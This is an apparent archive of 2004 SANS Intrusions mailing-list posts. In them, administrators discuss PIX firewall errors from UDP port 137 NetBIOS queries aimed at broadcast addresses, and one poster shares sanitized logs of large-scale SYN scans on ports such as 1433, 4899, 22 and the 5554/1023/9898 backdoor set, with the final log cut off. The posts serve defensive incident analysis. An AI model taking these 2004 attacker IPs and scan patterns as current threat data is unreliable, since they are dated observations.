The log on the PIX firewall is being flooded with these errors (see below). What is odd is that every day the network and broadcast addresses change, but our entire Class B eventually gets covered. This port 137 UDP traffic is coming from valid secondary DNS servers running Microsoft DNS.
The DNS servers are doing a NBTSTAT -a type of query to answer a reverse lookup DNS query. What we cannot figure out is why we would get queries to network addresses and broadcast addresses. The reverse lookup function is needed to authorize .mil clients to access .mil Web sites. We cannot block the port 137 queries or we lose this automatic function (which works fine for a valid IP) for thousands of computers across multiple Windows Domains. Because these secondary DNS servers are physically located in another location not under our control, we cannot get a capture of the full conversation.

The IPs have been sanitized. The src outside is the DNS server and the dst inside is one of our network numbers.

2004-07-06 00:27:12 Local4.Error 10.10.34.49 Jul 05 2004 23:25:27: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.54.0/137
2004-07-06 00:27:12 Local4.Error 10.10.34.49 Jul 05 2004 23:25:27: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.34.0/137
2004-07-06 00:29:56 Local4.Error 10.10.34.49 Jul 05 2004 23:28:11: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.34.31/137
2004-07-06 00:31:19 Local4.Error 10.10.34.49 Jul 05 2004 23:29:33: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src DMZ:10.10.138.20/137 dst inside:10.10.34.48/137

Your thoughts would be greatly appreciated.

Tom

From pbrossman at healthplan.org Sat Jul 10 15:35:01 2004
From: pbrossman at healthplan.org (Phil Brossman)
Date: Sat, 10 Jul 2004 11:35:01 -0400
Subject: [Intrusions] UDP port 137 packets being sent to Network and Broadcast addresses
Message-ID:

Tom,

I noticed something similar in my PIX log the other day.
Take a look at it, will you:

07-10-2004 11:31:26 Local5.Error 172.16.1.12 %PIX-3-305005: No translation group found for udp src inside:192.168.10.3/137 dst Outside:192.168.10.255/137

Is this the same as what you're seeing? Please keep me in the loop if you find out more.

Thanks,
Phil Brossman

-----Original Message-----
From: Kenworthy, Thomas E. (CIV) [mailto:TEKenworthy at mar.med.navy.mil]
Sent: Friday, July 09, 2004 10:06 AM
To: intrusions at lists.sans.org
Subject: [Intrusions] UDP port 137 packets being sent to Network and Broadcast addresses

The log on the PIX firewall is being flooded with these errors (see below). What is odd is that every day the network and broadcast addresses change, but our entire Class B eventually gets covered. This port 137 UDP traffic is coming from valid secondary DNS servers running Microsoft DNS. The DNS servers are doing a NBTSTAT -a type of query to answer a reverse lookup DNS query. What we cannot figure out is why we would get queries to network addresses and broadcast addresses. The reverse lookup function is needed to authorize .mil clients to access .mil Web sites. We cannot block the port 137 queries or we lose this automatic function (which works fine for a valid IP) for thousands of computers across multiple Windows Domains. Because these secondary DNS servers are physically located in another location not under our control, we cannot get a capture of the full conversation.

The IPs have been sanitized. The src outside is the DNS server and the dst inside is one of our network numbers.
2004-07-06 00:27:12 Local4.Error 10.10.34.49 Jul 05 2004 23:25:27: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.54.0/137
2004-07-06 00:27:12 Local4.Error 10.10.34.49 Jul 05 2004 23:25:27: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.34.0/137
2004-07-06 00:29:56 Local4.Error 10.10.34.49 Jul 05 2004 23:28:11: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src outside:172.16.63.49/137 dst inside:10.10.34.31/137
2004-07-06 00:31:19 Local4.Error 10.10.34.49 Jul 05 2004 23:29:33: %PIX-3-305006: Dst IP is network/broadcast IP, translation creation failed for udp src DMZ:10.10.138.20/137 dst inside:10.10.34.48/137

Your thoughts would be greatly appreciated.

Tom

_______________________________________________
Intrusions mailing list
Intrusions at lists.sans.org
http://www.dshield.org/mailman/listinfo/intrusions

From Ken.Connelly at uni.edu Sat Jul 10 16:35:51 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Sat, 10 Jul 2004 11:35:51 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LCAMMC8Q5W8YC47U@uni.edu>

The following extracts show the beginning and ending of scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.
Jul 9 19:52:05 139.30.123.148:1817 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 9 19:52:08 139.30.123.148:1819 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 9 19:52:08 139.30.123.148:1821 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 9 19:52:08 139.30.123.148:1823 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 9 19:52:08 139.30.123.148:1825 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 9 19:52:08 139.30.123.148:1828 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 9 19:52:08 139.30.123.148:1830 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 9 19:52:05 139.30.123.148:1832 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 9 20:08:13 139.30.123.148:3597 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 9 20:08:13 139.30.123.148:3593 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 9 20:08:13 139.30.123.148:3599 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 9 20:08:13 139.30.123.148:3589 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 9 20:08:13 139.30.123.148:3595 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 9 20:08:13 139.30.123.148:3602 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 9 20:08:13 139.30.123.148:3605 -> xxx.yyy.255.253:1433 SYN ******S*
Jul 9 20:08:13 139.30.123.148:3606 -> xxx.yyy.255.254:1433 SYN ******S*
74636

Jul 9 13:54:19 211.196.189.246:1132 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 9 13:54:19 211.196.189.246:1134 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 9 13:54:19 211.196.189.246:1138 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 9 13:54:19 211.196.189.246:1136 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 9 13:54:19 211.196.189.246:1140 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 9 13:54:19 211.196.189.246:1144 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 9 13:54:19 211.196.189.246:1142 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 9 13:54:19 211.196.189.246:1146 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 9 14:05:17 211.196.189.246:2997 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 9 14:05:17 211.196.189.246:3003 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 9 14:05:17 211.196.189.246:2993 -> xxx.yyy.255.243:1433 SYN ******S*
Jul 9 14:05:17 211.196.189.246:2999 -> xxx.yyy.255.246:1433 SYN ******S*
Jul 9 14:05:17 211.196.189.246:2991 -> xxx.yyy.255.242:1433 SYN ******S*
Jul 9 14:05:17 211.196.189.246:3007 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 9 14:05:17 211.196.189.246:3011 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 9 14:05:17 211.196.189.246:3013 -> xxx.yyy.255.253:1433 SYN ******S*
Jul 9 14:05:17 211.196.189.246:3015 -> xxx.yyy.255.254:1433 SYN ******S*
73032

Jul 9 06:47:57 130.191.84.17:2333 -> xxx.yyy.1.1:8000 SYN ******S*
Jul 9 06:47:57 130.191.84.17:2334 -> xxx.yyy.1.2:8000 SYN ******S*
Jul 9 06:47:57 130.191.84.17:2335 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 9 06:47:59 130.191.84.17:2336 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 9 06:47:59 130.191.84.17:2337 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 9 06:47:59 130.191.84.17:2338 -> xxx.yyy.1.6:8000 SYN ******S*
Jul 9 06:47:59 130.191.84.17:2339 -> xxx.yyy.1.7:8000 SYN ******S*
Jul 9 06:47:59 130.191.84.17:2340 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jul 9 06:58:51 130.191.84.17:1287 -> xxx.yyy.255.247:8000 SYN ******S*
Jul 9 06:58:51 130.191.84.17:1284 -> xxx.yyy.255.244:8000 SYN ******S*
Jul 9 06:58:51 130.191.84.17:1281 -> xxx.yyy.255.241:8000 SYN ******S*
Jul 9 06:58:51 130.191.84.17:1288 -> xxx.yyy.255.248:8000 SYN ******S*
Jul 9 06:58:51 130.191.84.17:1292 -> xxx.yyy.255.252:8000 SYN ******S*
Jul 9 06:58:51 130.191.84.17:1293 -> xxx.yyy.255.253:8000 SYN ******S*
Jul 9 06:58:51 130.191.84.17:1290 -> xxx.yyy.255.250:8000 SYN ******S*
Jul 9 06:58:51 130.191.84.17:1294 -> xxx.yyy.255.254:8000 SYN ******S*
Jul 9 06:58:51 130.191.84.17:1291 -> xxx.yyy.255.251:8000 SYN ******S*
72888

Jul 9 17:18:12 203.94.243.79:3978 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 9 17:18:12 203.94.243.79:3979 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 9 17:18:12 203.94.243.79:3980 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 9 17:18:12 203.94.243.79:3981 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 9 17:18:09 203.94.243.79:3982 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 9 17:18:09 203.94.243.79:3983 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 9 17:18:12 203.94.243.79:3984 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 9 17:18:12 203.94.243.79:3985 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 9 17:30:55 203.94.243.79:2240 -> xxx.yyy.255.243:1433 SYN ******S*
Jul 9 17:30:55 203.94.243.79:2238 -> xxx.yyy.255.241:1433 SYN ******S*
Jul 9 17:30:55 203.94.243.79:2248 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 9 17:30:55 203.94.243.79:2251 -> xxx.yyy.255.254:1433 SYN ******S*
Jul 9 17:30:55 203.94.243.79:2246 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 9 17:30:55 203.94.243.79:2249 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 9 17:30:55 203.94.243.79:2245 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 9 17:30:55 203.94.243.79:2247 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 9 17:30:55 203.94.243.79:2250 -> xxx.yyy.255.253:1433 SYN ******S*
71340

Jul 9 19:37:01 213.237.79.218:4585 -> xxx.yyy.1.1:4000 SYN ******S*
Jul 9 19:37:01 213.237.79.218:4586 -> xxx.yyy.1.2:4000 SYN ******S*
Jul 9 19:37:01 213.237.79.218:4587 -> xxx.yyy.1.3:4000 SYN ******S*
Jul 9 19:37:02 213.237.79.218:4588 -> xxx.yyy.1.4:4000 SYN ******S*
Jul 9 19:37:02 213.237.79.218:4589 -> xxx.yyy.1.5:4000 SYN ******S*
Jul 9 19:37:02 213.237.79.218:4590 -> xxx.yyy.1.6:4000 SYN ******S*
Jul 9 19:37:02 213.237.79.218:4591 -> xxx.yyy.1.7:4000 SYN ******S*
Jul 9 19:37:02 213.237.79.218:4592 -> xxx.yyy.1.8:4000 SYN ******S*
[...]
Jul 9 19:48:44 213.237.79.218:4431 -> xxx.yyy.255.146:4000 SYN ******S*
Jul 9 19:48:44 213.237.79.218:4427 -> xxx.yyy.255.143:4000 SYN ******S*
Jul 9 19:48:44 213.237.79.218:4438 -> xxx.yyy.255.153:4000 SYN ******S*
Jul 9 19:48:44 213.237.79.218:4439 -> xxx.yyy.255.154:4000 SYN ******S*
Jul 9 19:48:44 213.237.79.218:4440 -> xxx.yyy.255.155:4000 SYN ******S*
Jul 9 19:48:45 213.237.79.218:4451 -> xxx.yyy.255.166:4000 SYN ******S*
Jul 9 19:48:45 213.237.79.218:4449 -> xxx.yyy.255.164:4000 SYN ******S*
Jul 9 19:48:45 213.237.79.218:4450 -> xxx.yyy.255.165:4000 SYN ******S*
70976

Jul 9 17:00:52 61.77.160.67:3004 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 9 17:00:52 61.77.160.67:3005 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 9 17:00:52 61.77.160.67:3007 -> xxx.yyy.1.8:1433 SYN ******S*
Jul 9 17:00:52 61.77.160.67:3008 -> xxx.yyy.1.9:1433 SYN ******S*
Jul 9 17:00:52 61.77.160.67:3011 -> xxx.yyy.1.12:1433 SYN ******S*
Jul 9 17:00:49 61.77.160.67:3000 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 9 17:00:52 61.77.160.67:3013 -> xxx.yyy.1.14:1433 SYN ******S*
Jul 9 17:00:49 61.77.160.67:3001 -> xxx.yyy.1.2:1433 SYN ******S*
[...]
Jul 9 17:05:51 61.77.160.67:1866 -> xxx.yyy.255.232:1433 SYN ******S*
Jul 9 17:05:51 61.77.160.67:1850 -> xxx.yyy.255.216:1433 SYN ******S*
Jul 9 17:05:51 61.77.160.67:1847 -> xxx.yyy.255.213:1433 SYN ******S*
Jul 9 17:05:51 61.77.160.67:1863 -> xxx.yyy.255.229:1433 SYN ******S*
Jul 9 17:05:51 61.77.160.67:1815 -> xxx.yyy.255.181:1433 SYN ******S*
Jul 9 17:05:51 61.77.160.67:1867 -> xxx.yyy.255.233:1433 SYN ******S*
Jul 9 17:05:51 61.77.160.67:1854 -> xxx.yyy.255.220:1433 SYN ******S*
Jul 9 17:05:51 61.77.160.67:1819 -> xxx.yyy.255.185:1433 SYN ******S*
66564

Jul 9 01:03:09 206.45.126.95:3390 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 9 01:03:09 206.45.126.95:3395 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 9 01:03:09 206.45.126.95:3400 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 9 01:03:08 206.45.126.95:3413 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 9 01:03:08 206.45.126.95:3424 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 9 01:03:08 206.45.126.95:3436 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 9 01:03:08 206.45.126.95:3444 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 9 01:03:08 206.45.126.95:3446 -> xxx.yyy.1.8:4899 SYN ******S*
[...]
Jul 9 01:33:35 206.45.126.95:3757 -> xxx.yyy.255.242:4899 SYN ******S*
Jul 9 01:33:35 206.45.126.95:3798 -> xxx.yyy.255.247:4899 SYN ******S*
Jul 9 01:33:35 206.45.126.95:3803 -> xxx.yyy.255.248:4899 SYN ******S*
Jul 9 01:33:35 206.45.126.95:3811 -> xxx.yyy.255.249:4899 SYN ******S*
Jul 9 01:33:35 206.45.126.95:3813 -> xxx.yyy.255.250:4899 SYN ******S*
Jul 9 01:33:35 206.45.126.95:3818 -> xxx.yyy.255.251:4899 SYN ******S*
Jul 9 01:33:35 206.45.126.95:3819 -> xxx.yyy.255.252:4899 SYN ******S*
Jul 9 01:33:35 206.45.126.95:3821 -> xxx.yyy.255.253:4899 SYN ******S*
Jul 9 01:33:35 206.45.126.95:3827 -> xxx.yyy.255.254:4899 SYN ******S*
56345

Jul 9 15:32:01 211.234.110.90:1763 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 9 15:32:01 211.234.110.90:1764 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 9 15:32:01 211.234.110.90:1765 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 9 15:31:59 211.234.110.90:1766 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 9 15:31:59 211.234.110.90:1767 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 9 15:31:59 211.234.110.90:1768 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 9 15:31:59 211.234.110.90:1770 -> xxx.yyy.1.8:4899 SYN ******S*
Jul 9 15:31:59 211.234.110.90:1769 -> xxx.yyy.1.7:4899 SYN ******S*
[...]
Jul 9 15:35:21 211.234.110.90:4318 -> xxx.yyy.255.247:4899 SYN ******S*
Jul 9 15:35:21 211.234.110.90:4319 -> xxx.yyy.255.248:4899 SYN ******S*
Jul 9 15:35:21 211.234.110.90:4320 -> xxx.yyy.255.249:4899 SYN ******S*
Jul 9 15:35:21 211.234.110.90:4321 -> xxx.yyy.255.250:4899 SYN ******S*
Jul 9 15:35:21 211.234.110.90:4322 -> xxx.yyy.255.251:4899 SYN ******S*
Jul 9 15:35:21 211.234.110.90:4323 -> xxx.yyy.255.252:4899 SYN ******S*
Jul 9 15:35:21 211.234.110.90:4324 -> xxx.yyy.255.253:4899 SYN ******S*
Jul 9 15:35:21 211.234.110.90:4325 -> xxx.yyy.255.254:4899 SYN ******S*
42547

Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.1.105:22 SYN ******S*
Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.1.236:22 SYN ******S*
Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.10.28:22 SYN ******S*
Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.11.34:22 SYN ******S*
Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.12.171:22 SYN ******S*
Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.13.177:22 SYN ******S*
Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.14.183:22 SYN ******S*
Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.15.58:22 SYN ******S*
[...]
Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.245.174:22 SYN ******S*
Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.246.49:22 SYN ******S*
Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.246.180:22 SYN ******S*
Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.247.186:22 SYN ******S*
Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.248.192:22 SYN ******S*
Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.250.73:22 SYN ******S*
Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.253.222:22 SYN ******S*
Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.255.103:22 SYN ******S*
27553

Jul 9 23:47:29 221.216.67.206:4482 -> xxx.yyy.215.213:5554 SYN ******S*
Jul 9 23:47:30 221.216.67.206:1148 -> xxx.yyy.215.213:1023 SYN ******S*
Jul 9 23:47:32 221.216.67.206:1966 -> xxx.yyy.215.213:9898 SYN ******S*
Jul 9 23:47:29 221.216.67.206:4492 -> xxx.yyy.215.219:5554 SYN ******S*
Jul 9 23:47:30 221.216.67.206:1159 -> xxx.yyy.215.219:1023 SYN ******S*
Jul 9 23:47:32 221.216.67.206:2018 -> xxx.yyy.215.219:9898 SYN ******S*
Jul 9 23:47:29 221.216.67.206:4486 -> xxx.yyy.215.210:5554 SYN ******S*
Jul 9 23:47:30 221.216.67.206:1150 -> xxx.yyy.215.210:1023 SYN ******S*
[...]
Jul 9 23:48:31 221.216.67.206:2138 -> xxx.yyy.236.74:9898 SYN ******S*
Jul 9 23:48:31 221.216.67.206:2141 -> xxx.yyy.236.64:9898 SYN ******S*
Jul 9 23:48:31 221.216.67.206:1985 -> xxx.yyy.236.25:9898 SYN ******S*
Jul 9 23:48:31 221.216.67.206:2257 -> xxx.yyy.217.156:9898 SYN ******S*
Jul 9 23:48:31 221.216.67.206:2256 -> xxx.yyy.217.158:9898 SYN ******S*
Jul 9 23:48:31 221.216.67.206:2317 -> xxx.yyy.217.143:9898 SYN ******S*
Jul 9 23:48:31 221.216.67.206:2316 -> xxx.yyy.217.157:9898 SYN ******S*
Jul 9 23:48:31 221.216.67.206:2323 -> xxx.yyy.217.155:9898 SYN ******S*
15407

Jul 9 23:56:43 220.121.242.156:2324 -> xxx.yyy.72.137:5554 SYN ******S*
Jul 9 23:56:44 220.121.242.156:2789 -> xxx.yyy.72.137:1023 SYN ******S*
Jul 9 23:56:43 220.121.242.156:2330 -> xxx.yyy.72.131:5554 SYN ******S*
Jul 9 23:56:44 220.121.242.156:2792 -> xxx.yyy.72.131:1023 SYN ******S*
Jul 9 23:56:43 220.121.242.156:2332 -> xxx.yyy.72.129:5554 SYN ******S*
Jul 9 23:56:44 220.121.242.156:2793 -> xxx.yyy.72.129:1023 SYN ******S*
Jul 9 23:56:43 220.121.242.156:2331 -> xxx.yyy.72.130:5554 SYN ******S*
Jul 9 23:56:44 220.121.242.156:2824 -> xxx.yyy.72.130:1023 SYN ******S*
[...]
Jul 9 23:57:32 220.121.242.156:2828 -> xxx.yyy.92.240:9898 SYN ******S*
Jul 9 23:57:32 220.121.242.156:2831 -> xxx.yyy.92.243:9898 SYN ******S*
Jul 9 23:57:32 220.121.242.156:2830 -> xxx.yyy.92.242:9898 SYN ******S*
Jul 9 23:57:32 220.121.242.156:2813 -> xxx.yyy.92.234:9898 SYN ******S*
Jul 9 23:57:32 220.121.242.156:2814 -> xxx.yyy.92.235:9898 SYN ******S*
Jul 9 23:57:32 220.121.242.156:2851 -> xxx.yyy.92.246:9898 SYN ******S*
Jul 9 23:57:32 220.121.242.156:2824 -> xxx.yyy.92.236:9898 SYN ******S*
Jul 9 23:57:32 220.121.242.156:2832 -> xxx.yyy.92.244:9898 SYN ******S*
15016

Jul 9 23:56:24 220.124.154.238:2818 -> xxx.yyy.153.136:5554 SYN ******S*
Jul 9 23:56:25 220.124.154.238:3256 -> xxx.yyy.153.136:1023 SYN ******S*
Jul 9 23:56:27 220.124.154.238:4182 -> xxx.yyy.153.136:9898 SYN ******S*
Jul 9 23:56:24 220.124.154.238:2821 -> xxx.yyy.153.140:5554 SYN ******S*
Jul 9 23:56:25 220.124.154.238:3261 -> xxx.yyy.153.140:1023 SYN ******S*
Jul 9 23:56:27 220.124.154.238:4188 -> xxx.yyy.153.140:9898 SYN ******S*
Jul 9 23:56:24 220.124.154.238:2822 -> xxx.yyy.153.141:5554 SYN ******S*
Jul 9 23:56:25 220.124.154.238:3262 -> xxx.yyy.153.141:1023 SYN ******S*
[...]
Jul 9 23:57:09 220.124.154.238:3045 -> xxx.yyy.173.51:9898 SYN ******S*
Jul 9 23:57:09 220.124.154.238:3055 -> xxx.yyy.173.53:9898 SYN ******S*
Jul 9 23:57:09 220.124.154.238:3052 -> xxx.yyy.173.52:9898 SYN ******S*
Jul 9 23:57:09 220.124.154.238:3062 -> xxx.yyy.173.55:9898 SYN ******S*
Jul 9 23:57:09 220.124.154.238:3057 -> xxx.yyy.173.54:9898 SYN ******S*
Jul 9 23:57:09 220.124.154.238:3063 -> xxx.yyy.173.56:9898 SYN ******S*
Jul 9 23:57:09 220.124.154.238:3064 -> xxx.yyy.173.57:9898 SYN ******S*
Jul 9 23:57:10 220.124.154.238:3077 -> xxx.yyy.173.58:9898 SYN ******S*
Jul 9 23:57:10 220.124.154.238:3096 -> xxx.yyy.173.59:9898 SYN ******S*
14917

Jul 9 09:20:11 62.201.107.204:3043 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 9 09:20:11 62.201.107.204:3044 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 9 09:20:11 62.201.107.204:3045 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 9 09:20:14 62.201.107.204:3046 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 9 09:20:14 62.201.107.204:3047 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 9 09:20:14 62.201.107.204:3048 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 9 09:20:11 62.201.107.204:3049 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 9 09:20:11 62.201.107.204:3050 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 9 09:24:40 62.201.107.204:4398 -> xxx.yyy.87.234:1433 SYN ******S*
Jul 9 09:24:40 62.201.107.204:4399 -> xxx.yyy.87.235:1433 SYN ******S*
Jul 9 09:24:40 62.201.107.204:4401 -> xxx.yyy.87.237:1433 SYN ******S*
Jul 9 09:24:40 62.201.107.204:4402 -> xxx.yyy.87.238:1433 SYN ******S*
Jul 9 09:24:40 62.201.107.204:4403 -> xxx.yyy.87.239:1433 SYN ******S*
Jul 9 09:24:40 62.201.107.204:4404 -> xxx.yyy.87.240:1433 SYN ******S*
Jul 9 09:24:40 62.201.107.204:4405 -> xxx.yyy.87.241:1433 SYN ******S*
Jul 9 09:24:40 62.201.107.204:4406 -> xxx.yyy.87.242:1433 SYN ******S*
Jul 9 09:24:40 62.201.107.204:4407 -> xxx.yyy.87.243:1433 SYN ******S*
14313

Jul 9 00:56:11 218.24.185.215:4091 -> xxx.yyy.174.60:5554 SYN ******S*
Jul 9 00:56:12 218.24.185.215:4850 -> xxx.yyy.174.60:1023 SYN ******S*
Jul 9 00:56:14 218.24.185.215:1849 -> xxx.yyy.174.60:9898 SYN ******S*
Jul 9 00:56:11 218.24.185.215:4093 -> xxx.yyy.174.57:5554 SYN ******S*
Jul 9 00:56:12 218.24.185.215:4854 -> xxx.yyy.174.57:1023 SYN ******S*
Jul 9 00:56:14 218.24.185.215:1851 -> xxx.yyy.174.57:9898 SYN ******S*
Jul 9 00:56:11 218.24.185.215:4092 -> xxx.yyy.174.58:5554 SYN ******S*
Jul 9 00:56:12 218.24.185.215:4852 -> xxx.yyy.174.58:1023 SYN ******S*
[...]
Jul 9 00:56:58 218.24.185.215:1153 -> xxx.yyy.194.117:9898 SYN ******S*
Jul 9 00:56:58 218.24.185.215:1161 -> xxx.yyy.194.118:9898 SYN ******S*
Jul 9 00:56:58 218.24.185.215:1162 -> xxx.yyy.194.120:9898 SYN ******S*
Jul 9 00:56:58 218.24.185.215:1163 -> xxx.yyy.194.121:9898 SYN ******S*
Jul 9 00:56:58 218.24.185.215:1173 -> xxx.yyy.194.122:9898 SYN ******S*
Jul 9 00:56:58 218.24.185.215:1174 -> xxx.yyy.194.123:9898 SYN ******S*
Jul 9 00:56:58 218.24.185.215:1175 -> xxx.yyy.194.124:9898 SYN ******S*
Jul 9 00:56:58 218.24.185.215:1179 -> xxx.yyy.194.119:9898 SYN ******S*
13033

Jul 9 00:56:48 211.161.154.71:3646 -> xxx.yyy.174.224:5554 SYN ******S*
Jul 9 00:56:49 211.161.154.71:4261 -> xxx.yyy.174.224:1023 SYN ******S*
Jul 9 00:56:51 211.161.154.71:1738 -> xxx.yyy.174.224:9898 SYN ******S*
Jul 9 00:56:48 211.161.154.71:3647 -> xxx.yyy.174.222:5554 SYN ******S*
Jul 9 00:56:49 211.161.154.71:4331 -> xxx.yyy.174.222:1023 SYN ******S*
Jul 9 00:56:51 211.161.154.71:1755 -> xxx.yyy.174.222:9898 SYN ******S*
Jul 9 00:56:48 211.161.154.71:3648 -> xxx.yyy.174.225:5554 SYN ******S*
Jul 9 00:56:49 211.161.154.71:4265 -> xxx.yyy.174.225:1023 SYN ******S*
[...]
Jul 9 00:57:37 211.161.154.71:1271 -> xxx.yyy.195.83:9898 SYN ******S*
Jul 9 00:57:37 211.161.154.71:1273 -> xxx.yyy.195.85:9898 SYN ******S*
Jul 9 00:57:37 211.161.154.71:1277 -> xxx.yyy.195.88:9898 SYN ******S*
Jul 9 00:57:37 211.161.154.71:1276 -> xxx.yyy.195.81:9898 SYN ******S*
Jul 9 00:57:37 211.161.154.71:1278 -> xxx.yyy.195.84:9898 SYN ******S*
Jul 9 00:57:37 211.161.154.71:1280 -> xxx.yyy.195.86:9898 SYN ******S*
Jul 9 00:57:37 211.161.154.71:1281 -> xxx.yyy.195.87:9898 SYN ******S*
Jul 9 00:57:37 211.161.154.71:1314 -> xxx.yyy.174.223:9898 SYN ******S*
12925

Jul 9 00:56:19 221.200.12.187:2950 -> xxx.yyy.71.160:5554 SYN ******S*
Jul 9 00:56:20 221.200.12.187:3443 -> xxx.yyy.71.160:1023 SYN ******S*
Jul 9 00:56:22 221.200.12.187:4673 -> xxx.yyy.71.160:9898 SYN ******S*
Jul 9 00:56:19 221.200.12.187:2951 -> xxx.yyy.71.161:5554 SYN ******S*
Jul 9 00:56:22 221.200.12.187:4674 -> xxx.yyy.71.161:9898 SYN ******S*
Jul 9 00:56:19 221.200.12.187:2952 -> xxx.yyy.71.162:5554 SYN ******S*
Jul 9 00:56:22 221.200.12.187:4677 -> xxx.yyy.71.162:9898 SYN ******S*
Jul 9 00:56:19 221.200.12.187:2954 -> xxx.yyy.71.164:5554 SYN ******S*
[...]
Jul 9 00:57:05 221.200.12.187:2085 -> xxx.yyy.92.25:9898 SYN ******S*
Jul 9 00:57:05 221.200.12.187:2082 -> xxx.yyy.92.22:9898 SYN ******S*
Jul 9 00:57:05 221.200.12.187:2084 -> xxx.yyy.92.24:9898 SYN ******S*
Jul 9 00:57:05 221.200.12.187:2087 -> xxx.yyy.71.214:9898 SYN ******S*
Jul 9 00:57:05 221.200.12.187:2088 -> xxx.yyy.71.215:9898 SYN ******S*
Jul 9 00:57:05 221.200.12.187:2092 -> xxx.yyy.71.217:9898 SYN ******S*
Jul 9 00:57:05 221.200.12.187:2089 -> xxx.yyy.71.216:9898 SYN ******S*
Jul 9 00:57:05 221.200.12.187:2093 -> xxx.yyy.71.218:9898 SYN ******S*
Jul 9 00:57:05 221.200.12.187:2094 -> xxx.yyy.71.219:9898 SYN ******S*
11467

Jul 9 06:56:27 212.145.209.19:4310 -> xxx.yyy.194.124:5554 SYN ******S*
